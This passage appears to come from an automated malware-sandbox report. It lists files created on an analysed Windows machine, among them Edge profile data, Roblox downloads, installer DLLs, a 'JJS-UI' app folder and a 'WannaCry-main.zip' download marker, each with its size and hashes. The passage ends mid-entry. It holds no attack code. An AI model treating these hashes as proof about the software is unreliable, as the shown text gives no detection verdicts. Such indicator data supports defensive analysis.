a9e7efb618ba656ab55c78fc11e9919157b96839da1f402fb18a79e42cea22235a3a6f8fadfdf0b25a3312ed6da9fd45fc0ac13f893d3761b27483b14f11f908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
7f09b03642cd6692207a5df180f0578e

SHA1
715a5f89d379da32f8d3484ee2f84b1b39349dcd

SHA256
e9653e8c379d19bbbefd82edebb9bef1c5ee09e9c9082ef96612d3ba5774d53b

SHA512
b03eb81b77b38716301e156447a014c1d4f129597da94460227209e67ce5660150b492268091b705c046df659a3b7fbc5131bd91e73004a1001ce0d165e4f9d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
8KB

MD5
735f3b3509d9ef7ebb8b5b0a54e45214

SHA1
5c2590d38e269adbdbdca1fd7edbed2d23a91839

SHA256
856a72e4860647e4c73fe90dc29ffc2d2ab9fbc86edf76f71c10b07fe1220bc2

SHA512
f2aa6b35195f971b352a969d0b296f7c2b8ec202d7bf42ddeb92edf3445d31e5539aecd4364b04e6b80eb4836394fb6c0e6727c6a10c0b1f25add0392cf36973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
10KB

MD5
f40f46d6346dfd52fbde083321144bd4

SHA1
415a98888e48cbe9906f4d982cdff80cf5bcafaf

SHA256
479cf2edb3a52ce2d21bac62bab715cd402a91e2bea988648b369f8e1448b275

SHA512
9e7ca987d0e2bdf174b55fc84f460fddb1c3d3dfa2f4cc9e7db7edea11f6612cf3c102db7bc84bd30409ad1eb01fba4133b4f4248bf4e0457380dab7734c6b5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
0af4f6534ed2287cccc46e95337413b8

SHA1
570ee50b8a4b69e9c087e6afa6045067faa430d4

SHA256
918928d096aedd1e2ea84c169295a9c7f869c0d25a1ef7e6a937d5be1b4963d4

SHA512
a2349970a597c6a8eedd2cbbb14bb42f8cf8fc116838e36d8d1a131c5842a84e74cda67f45d9332f57e314ae80bcf217f094e75321e33402af2808897061e3fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
7dc0133e41e55857a1a6700a12c8f285

SHA1
646be86f69f151408e0d8a39cc3e504e268825e5

SHA256
1a181090e86c9808e8057149b4357a5ca2ce8a1d1d5e2b19c5c328338577fee8

SHA512
8f0c31bb27ea3f1b8001535d54a1ad0c3645a657f1f90d506fb0697be0a29b2c34ce30a7a2ccbeadca479b4d7f14c80ad2c83872744a0f782de076514c6f4a8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
a3273d89dc3d88ee6e092186bbf3a236

SHA1
4fdee03e08dc952495b8b76d895542540fac37ad

SHA256
c20d84eeac8bb2b70683c47ecb93eba83b4026dbffbcd2dfaf069e065de8a8d2

SHA512
26b4544c3996fccbfa09d5868c5dd48cc3a578a35f236d98c6bb17153aaee2ae538d6ae5f1bb5e8aad31e790bbad80222998282ed81e9236da93e3da427cfcb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
e783dc295eedf183f4709f1cdfb4995d

SHA1
804c3ba071220afe1ed696c3e8764aa1e9cb5812

SHA256
49c2656d277ea031cd11d40a57d48a5bd922f576e81a5cfeb988cbf2214a0114

SHA512
cd627637ea13cd2ed34b1c4618cf98e103545dd99358bc49ecfd784e4552247263009bf81be60743b4f7ba7ae1905e00f3dba76b2afea125950495f86de33a9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
870B

MD5
8eacc4866878cc328ca9e608193f7a38

SHA1
dbeefb9aac38931adca199170cf022938ecf3bcc

SHA256
63a67fe9267d416cdf4c25d4a49cf682fab12fb6bd632bea91975b7844bc8f36

SHA512
6e8a80f73793d00e7255ae491731ea2f8fc87583898222fbf7a7c3544e75508ec4aa551e108f1811fb4ac5778b9cc115b2ebec9c68e35711a9fca5742048d551

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
a1fde1f23514960487f58a432845c7d8

SHA1
4a1ad28436c70fc4e485470116feb671ce8b9ed5

SHA256
8fa1bd3ae63d4a0499be6183e61a50aead70ae987e1e100601ffe8d34a1cd9ac

SHA512
a021f0d45e0e0e475e27eac173e9403c990423f5ddcc02c20636cc8447a831ce0ce499ec7507aaf2cba92f1055ddc278d46b043f8232a16cc9717359d88afa37

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
ff41f9c3edd0031d57b0cead6cca81d7

SHA1
e27d41fb09ee3d941037897a614309ab3a849240

SHA256
76ee55548b7c0bf23605d77c7e5254744221fcad300af89a31688977040c169a

SHA512
d900a2cc474b4985a5f0c1599c0266ac3c2b2463bea214d8660f58a8a36476fcf776396d43f3ff955f6965347db550c182f97e90d5a30f1646b0d84d68f8e68d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
250a4b583d9d102b65bbcce3e7c08135

SHA1
f974d7e5cf1d7b1bba67eb51abaab7b5fcfb6a64

SHA256
a8b03280074ff420109a2829199c349594cba92e36d398042593e31779fe102b

SHA512
fcf5049a0be98d58a0e1921e1755814e011df666c1d42e7d96327ec715cea508413373d5d41f51891162251a375bbb6b05a828f0cfeb9315b913506ffa22357e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
10KB

MD5
d4c411d5f68d0be1010dc8ad8b27c1b2

SHA1
3459232fca73ec07afce818d1609be15a67c0db4

SHA256
8f2bba2eeef0b48b8455bb45e128f4e377cb6e60a833a3d8d6fab5496c4e3524

SHA512
0b22224923d81e8a61a03f12d8908faf7d5c1d0696b1719c258e04bf982b9d39b506e542b02f695b6b6b47a10ce4d07b13a3aa095281d4cae84a5e29a75f976e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
870B

MD5
50431b0b33ec391bfb95d42812dec227

SHA1
13dc988f7a1a195914968760ceabaa99c9c95636

SHA256
ed9b329a3a90fcb51686b7b37ed3865c7952e1a30563db9b18c3e244bd1c293d

SHA512
86288017bbefaff5f9a3565ba7b6795dcc0c402b69222e279d33e3e080f4bfc9192be10f7ab7f5cf52bb4373e1479d3effaf2ca65b15684c4d31ef28706b146e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
ae37b5554d55d106cfd329fec47c4268

SHA1
0be0921ec264bf8fe98c3c761027db2d0591e5ef

SHA256
d49cfd1701451f4f60ed840ec34d90b2964d471acabce8ef9c2ec5e29e58e991

SHA512
c36f00466f3ad737a33a529747b593966b921da41f547ced5d8637145962af0533bd5d53eb54e8ad4134ee8f6e8f40ff09eb2799042bd3d1f31bfddc3dcad70f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
9KB

MD5
efc513ca3bf873a60b714d69a401a16c

SHA1
774fc7d1b94c5bc40b1d8c40faf23d7bffd11ad8

SHA256
37cef001324a60df55bc8b14dc40c984b3a959e9b27e03a066e92ffaf8b102fb

SHA512
5239937b6247f381876c7392f0f0d7957ceee9c71f99b54e0ec5fe65049f172fa0275cb7b4442b65f9bd5975069babc672d95ec25d1ba5a7815d1747801ef69a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
870B

MD5
da017fa20970ed80a87a83434f14daca

SHA1
91ba927adb60f923e8d19379c56f455754003a63

SHA256
84ece2e5897fa0e65d924498183d60a58158fbdcfeb8d05f91fcfefab9787bfd

SHA512
67c73e43d5affa4ed1025e0827de98144febdd02c7b2d65d95177740016267e7b5e70c832f41d0d01c41b11ba9fee16481af9261b3bdf2ee326115aed1ac4ad3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
239749c9fb73a7140907f8efc338e85f

SHA1
33bd3ce5c2c4be8006b2dd3f8a5faffa55631c7e

SHA256
03cb7424705e27c4692b72e2c01071fc7475ba04242ed064eae785304c4264bf

SHA512
f9eb5ff1424e84571e7c96b7717e534ba4c6d594b37e7bb8caaacf28613dd0f68f61849eb0f9b8c6349474db023bc407790f392777ffc4d73e19b887ab928c1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
71c1e824fcf3b04dc3979ce15233db67

SHA1
d0d93989f783526c4ae3250899f410f68d18e5e7

SHA256
1e1ac99749f6e1b350c5d34c8ab6400e691d6396abb57cb545687b9c29075a18

SHA512
82507f78404247c668f460334d6328f192636aef8ca9696928e45746fbeae921a0aa275d1141bd22823e0ca01715c06c633e0764b8a1341727cc4bd1d266a973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
c73c178842a26a1f02ea8e6944639b0f

SHA1
81b5fd18d2c80232cedbf63574cf2627051042e8

SHA256
a01475ad99d1c20821df585d14b4cddf19fd01cdad90d40ce46984cbaa91f324

SHA512
eaa9ecc74dd27433c473fa8772af1ca40947e0e21fa8a05a1d7228aa574a57ae355f4afa910638fc709cb11124c0067c351c4a97dba7bfa8a32645b0e795f9f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
84dfde480ac3530fd831ff32e04412a7

SHA1
fe8e1080fa4dc962446c8bd91df11258502bb359

SHA256
e19fc56329b05234200ad9a6c8bda972d35c1aadcb054322ddd3423cea476506

SHA512
100de15608d4433a1efac8a132c9e881223685b0e77ed7b60404d63c93b10756377fc3b4879f3cc98fe2f3fad285818ac3ce0b0ed94dcd32e48b5c1824d1d28c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
13KB

MD5
a51531f20f9efafe9e85a4c0459c2c14

SHA1
31e6d8290911d1b1d899b2042273005a85aef744

SHA256
4bf8f72480c7b46b25ea0ecfe34c969ba784087602daeeb9ea2fb0e0c05b2412

SHA512
fcd9e12eefcfbfa87f49b12f8d687437cb6ebca1951251a32cff30e42891cddc4f4aa77bafcd3cf179808aba437c91bb7fde2f5bb47a03465fa6662705038f41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586647.TMP

Filesize
370B

MD5
e5ce4adf8742326d510ac251452ac108

SHA1
8d0b342bc9cfebb9bc8cbb8740be7174ea92e173

SHA256
ce003651a1951e8a378de962b4ea89b965f563f49649d8ed41f0cc7107c63c93

SHA512
c452c3c59f0ab1a87e2c87a060e7063e9de94f89a2c39c7bdc31573b0fae3f98fecf67cc01ffdf6382c6659e92eaf13a577cb665e503589e54c8c4241c23b087

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c4d658b2-7f4e-453f-9667-8c8e2c626561.tmp

Filesize
4KB

MD5
fb689042fd29f35f0f2febfef4284564

SHA1
7f4c0fa3b1d4e2196900eae217be456098a67b47

SHA256
1fe1593405b003f9182917705cfd34edcde051f571cd1748cb6f376f0c9bb8c3

SHA512
b261047262242d6c0f9e8454e004b2a7f48a23d39eceebf5b4d53c4558315b323d4f3b371ad630d4103b0f390a1e77c8e81e58064bec21c75fad4232b9a35e5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
35685cf36f5c1cea133d42e4899c7757

SHA1
df029ce887d702844098ea6887dd2715d83ba56e

SHA256
d60a1b0d73e3d84401732d4e603342d4158d1bb3a0c8fe1c509096997b0cab1d

SHA512
6e19132a602f8723ff750f751eba6ab549f8237e763a9be49337f76ba19e78935d03a451406ccc8d5e6620efd458b9c976cc5ce46ac2f3eacf1ab19ad581e4e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7048ef16657dc61b162817b623ab09b6

SHA1
92d811c7813b62ae3ef2bb7a17de855ff49d1d58

SHA256
4dd8ba651e5476858bb50c73f6a121f774fd394664e7f5bf2155e4f1747f4cb2

SHA512
e3184ae4a628122d916004015fe11268cfc947dc27d6673ad8c3434aaabcda66864189b547ab3a8501e2af4ff84b27d426ff81b6349ab7bdc0777d3cffbcb0ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9818f4bc1e1adb764591f0aa67fc2560

SHA1
d680172aaaa7c3d396602191bc718e5194135e74

SHA256
1f197ee1cfc3610cf6dd44edb2778e015f72090658f5dc08e0c3c606d24e060f

SHA512
4c66b1d2434bbb3568dbf5673026ce5b2cb91a723c819e988f2043c4ad1d6f31e757495a985b4f76f8a035bc0c871ed4b4d96d1660d7ad7920d2bc2314a12593

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
043408de0eb8088364d56dbc2d4ff38b

SHA1
d6d1f4cf8a261392196108cbd5a47f7e3d08f773

SHA256
d8b0eb6108dc0b2dfa92f445bacbc6d98b849be0eaa9c695a77d48450fecbaa1

SHA512
12079a52adb7ee8588d306a4424cc2f3abfcc5aa2a8ae17489987f7c52342b87d32cb81a18e7ed4b92fa85bb33a0527b1e3a53f3b2d4b9355afab93bb34a889d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
93b4108746ea812cb116bc89495f575c

SHA1
193d4939e7ef5a10402dfc85cd154c13cd855ee3

SHA256
a82017012edae3e6c808ca46863a90176952b1c11476749311a1368de34f344d

SHA512
e39b92c5e55897dae0090bafe8f0f411c524a567fbec5aa4a01e86ad40f0e2550b4f24b9ced763b1a2859d881a85ccaa4a623c335c936fa79f096f3347c651b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
2ac761c9d4a85fb39b7e8fed3a58adf7

SHA1
cc0a2569f8e30fe206ee27b67844812c0ce81a98

SHA256
c07ce92d1aaac2220bc91b57dc64c86b6b55cf103b81637d9252039afbe72e09

SHA512
14ca5023b0b29a31bc0306f2681e9780fd0b8cd4217a235100da809c6353659e36417c2e7dcd65bc608b2584a8eb6277d0dfa8b30e028860c2de4788fc6034e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
14b44b0940300bef6dbc96267223204a

SHA1
8d2e3a8ee6a43c005406c654ccf99761f373d20a

SHA256
7a3cac653442e45a5e3bf5bcde8ba40c6e657083296d42c430734cac67296522

SHA512
2aa052b9b4bf5848d8f59275222fab971a0d171b4923adde322d16320b42f2efb075c780ceca5a7e8496b4bc476317a761e3d8dbfbd3260f2c8398ceefb28d78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f94768cad8e5f156246426f789381cb8

SHA1
1e5541b7a9282075bd2ddbf66e0113b3e5abdd5a

SHA256
0254bd3a8b62addf7dfc38b3daadfd4f81119d70d282382be754081946943410

SHA512
91c0cc4bf8d24750795efcf0ca29ca0d9572c0590012a40e9c084e370cbdf4a3dc7d5ade75d5db31bde3be4bcd9b78ad10f11f10d468cc762d7a8537d84cc4e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
32a76eaf27bb549c192d5edb49d3b98b

SHA1
86c78b4dfab00dcc9240d1c8eecd60d0ba600208

SHA256
80627b65035a369ff9e95d4b50f4ebb2cdbf61dfc96aad1789709a02cfee54c1

SHA512
cbc417a8f3495e5b7fb395dc38e50b8b7cc2af1a76342d009e111ff740c3a2d2f3cefd74dbc1498922e25dd3cc403e9510daede10821e8987a0fbeb4ae38e246

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d9d9ba7506b651f781599a01473a6833

SHA1
ecd674200dc975cbfaf1e20e565b7c4c6e40b31a

SHA256
b58d9be0250d20b6646d670fc1a364d19f6ab56822e3865985005fc4659e0005

SHA512
2907e67430fa9ec492dfa340baf204107659034d760018ff14a432a2a57130526d3319350a553cc2c3e69c31b190fa1d28a32eb9e0b1c70ede082d0885f50bf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ba5aca654c3da5a21836476195f28a15

SHA1
78a66eedfb3c3e1f6f925a8c8e518e1ada2e3c32

SHA256
8fc90bac1fd566775a1d69c511871303b606b75dd79641b6d3c151746213338e

SHA512
7bf8e13394a8f2920c4a10cafa61ba1261a0400885c022f7ed913609a8f7155e84211d1ec9def6af8c6bafc84c628a8efea5e09b57cb5f0ad76f73f4a024b413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9078ff2ba22a9163ab9b2557213246c5

SHA1
61ba45a3d47fe19a077465d6b0c63e7d32ec8d70

SHA256
50f20e2a2f95b57e411704a239113adb8650139787f5acdd8466d3c3052a0fdb

SHA512
b709e27122fe9169c0e68a2fddae0f8d66a3dfbe9a6fca5d06bebd447fb93e57bf2a51a599ac66e1e374d0f9efc3f205f37002f0e0cd2d57fa0c6427ecca03ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
95f1ec145ce7fe38a772c6d2c5001034

SHA1
fb58c273d701d34853d399d21915a60eb705eb73

SHA256
a1815bb24828b51229daa7b063a878c8b895cd77345c4adf5bd47cbbb456231d

SHA512
6a683881f519fe96557a71a7ceee8d96b999c554d0b6985200b287590b006cbcb4c86c3ba2eeb706ef6ef0a969be23c2f35cd75da31b3474399c8fd67f17a81d

Download Submit
C:\Users\Admin\AppData\Local\Roblox\Downloads\roblox-player\6670e5c270db13d474d6f93c38303245

Filesize
5.5MB

MD5
6670e5c270db13d474d6f93c38303245

SHA1
ec8566078f8b1aaa425f59502372be14a60c3ad1

SHA256
80cb35cc5a9750f74e8b005e4a52c384527c2d2510d38069f32b023c27f62033

SHA512
5a1354134ac1765ecc3d85dd94baddd4ffd570e9935b68f6e43a1179f8a0f6d0e664989bfb42b409a6b0b2c6a53e6d33bc9dda723632e0a658fef5275578ba26

Download Submit
C:\Users\Admin\AppData\Local\Roblox\Downloads\roblox-player\b93f42f728fdd67f390b066d6df035e0

Filesize
5.9MB

MD5
b93f42f728fdd67f390b066d6df035e0

SHA1
7c7f3e149096ce743262cfc30974689afc5c5152

SHA256
f32d067a66abe3ea7761ca4f698af726e82234088f3e4218e026d698c9c5f6c3

SHA512
17fdbe368d9f75e2b0f1d2c7e8730d398d3e6c8b4bc4e424d3519910d7756e622d2977fec60a8613f4c4062f4afc5d1f2da0f6b97b03ae7c1e720852ee47d804

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsc4AC9.tmp\SpiderBanner.dll

Filesize
9KB

MD5
17309e33b596ba3a5693b4d3e85cf8d7

SHA1
7d361836cf53df42021c7f2b148aec9458818c01

SHA256
996a259e53ca18b89ec36d038c40148957c978c0fd600a268497d4c92f882a93

SHA512
1abac3ce4f2d5e4a635162e16cf9125e059ba1539f70086c2d71cd00d41a6e2a54d468e6f37792e55a822d7082fb388b8dfecc79b59226bbb047b7d28d44d298

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsc4AC9.tmp\StdUtils.dll

Filesize
100KB

MD5
c6a6e03f77c313b267498515488c5740

SHA1
3d49fc2784b9450962ed6b82b46e9c3c957d7c15

SHA256
b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e

SHA512
9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsc4AC9.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsc4AC9.tmp\WinShell.dll

Filesize
3KB

MD5
1cc7c37b7e0c8cd8bf04b6cc283e1e56

SHA1
0b9519763be6625bd5abce175dcc59c96d100d4c

SHA256
9be85b986ea66a6997dde658abe82b3147ed2a1a3dcb784bb5176f41d22815a6

SHA512
7acf7f8e68aa6066b59ca9f2ae2e67997e6b347bc08eb788d2a119b3295c844b5b9606757168e8d2fbd61c2cda367bf80e9e48c9a52c28d5a7a00464bfd2048f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsc4AC9.tmp\nsProcess.dll

Filesize
4KB

MD5
f0438a894f3a7e01a4aae8d1b5dd0289

SHA1
b058e3fcfb7b550041da16bf10d8837024c38bf6

SHA256
30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11

SHA512
f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsc4AC9.tmp\nsis7z.dll

Filesize
424KB

MD5
80e44ce4895304c6a3a831310fbf8cd0

SHA1
36bd49ae21c460be5753a904b4501f1abca53508

SHA256
b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

SHA512
c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

Download Submit
C:\Users\Admin\AppData\Roaming\JJS-UI\Dictionaries\en-US-8-0.bdic

Filesize
436KB

MD5
0af2c2ded404eafedc91003914dc1650

SHA1
1ffddb9c1958a872401e906928934a34529b7433

SHA256
1ed02f55bb7a2689704b7995f0f7953fbcf9bfc7ce7f7f178168fe58f3481575

SHA512
60294b1ec4bd71c328f0aebd2ddffc6d1acb24be783d939b35ec059053f407b8c2d1cb8b082d3479ac1a12b87aa62e0055695a43b205e0be2aa7da210ba41526

Download Submit
C:\Users\Admin\AppData\Roaming\JJS-UI\GPUCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Roaming\JJS-UI\Network Persistent State~RFe6b7aad.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Roaming\JJS-UI\e308ed31-f00b-420f-a9ad-1553fbbcaba1.tmp

Filesize
340B

MD5
0e31e47873420dc769d14bd59b9cec27

SHA1
e010aae8fe8d1d4cfadb4b99fa71794cca0744c5

SHA256
b85860eb22d5d6ab9d0d93ee2850040e40977a4d9b33d52bbfdff6d4290529f0

SHA512
519e8c936151ce2958747f34cc59f85d400a109286af763896f1af472ccb762361efa70fd32924022940fa071077f6efb8b011b04e644bc6f1cd2f4304944ba1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
11KB

MD5
558a5a55f3d7a64ecfe436abbe72f12d

SHA1
532dae50f73e31db454f11773ed3298fcf111dd6

SHA256
6e79785a23469ea4b72fbd406f74696a6068b0c3605afa2ef66320b6a4426bf0

SHA512
414ba5054d6a361cb10e3b4a685aa35f34efdaf6553c992a0d4003b4fedba10ac64c54d6616143d9ce5815b5601ef1066dbeeff315fc432734667c2caec346c7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
11KB

MD5
9fb68051e799403efc873aea988f971b

SHA1
fdfd5d45558ef8fa15fd1735daef647a5a35b889

SHA256
77ce36eb6f21a39a3ac2f0a79d63dea586f7c9e6f280801b2913bb94f0a7e674

SHA512
3b06ecb7fd32ff97d73bb60ace41a8b1b7cb16d1185058aa5243daf4d4216acb4af46044152b57554e36a5c7a8060adcefdcbf7599c177b265c69179fab37152

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
573bb78b6a3be0978cc7ef33a045260e

SHA1
b3ec49d2245a0a0ecc0c15aa867adadc440ada4a

SHA256
4c732672fba38219c00c785b37afc7f4619fd8c0a6937e60b9601138447ae676

SHA512
de0607631a472138c164b4c37f6bed775fcac4d3b0a213323cc7c0a26f57d7631a827f8813a1e7951c4750d593a3856c4d841bfb4c4cfa689ca1c4ddf6cd8ab3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
d9216ac0b70ed006443766f5a667125f

SHA1
b08d030843943a5058f36974dbb352cb0f2d6bb5

SHA256
742731cc802f8052c09bad52cf7b39458638c9770bcd19c604f3dd264248b7f4

SHA512
3b7413f40366ea4f2eab7245180960ba597bfdb7125cc167edd8bbe397fe6de4d920f698f1eb60c51ae16993fda6f2920fd71d0f18e41aea8decfef4bc28ccd6

Download Submit
C:\Users\Admin\AppData\Roaming\jjv5conf.json

Filesize
118B

MD5
8cb06541718c50859b71a2744f0143cb

SHA1
2c10ad4c5aacda75de0d7ecc3348086c5257ffc9

SHA256
d099c061a8e56379c0c6c8febff67698d37801daec6e6b77cdc5ce207b90dd58

SHA512
d578d076fb89d336f518e1c398752cd96133198313e29d9a2e3a6348ea2d7448823624036a2530af3b9f5b5137f12ea66f6aab0b6f6ec81535b1c22e37a9a6da

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 144793.crdownload

Filesize
3.3MB

MD5
3c7861d067e5409eae5c08fd28a5bea2

SHA1
44e4b61278544a6a7b8094a0615d3339a8e75259

SHA256
07ecdced8cf2436c0bc886ee1e49ee4b8880a228aa173220103f35c535305635

SHA512
c2968e30212707acf8a146b25bb29c9f5d779792df88582b03431a0034dc82599f58d61fc9494324cc06873e5943f8c29bffd0272ca682d13c0bb10482d79fc5

Download Submit
C:\Users\Admin\Downloads\WannaCry-main.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
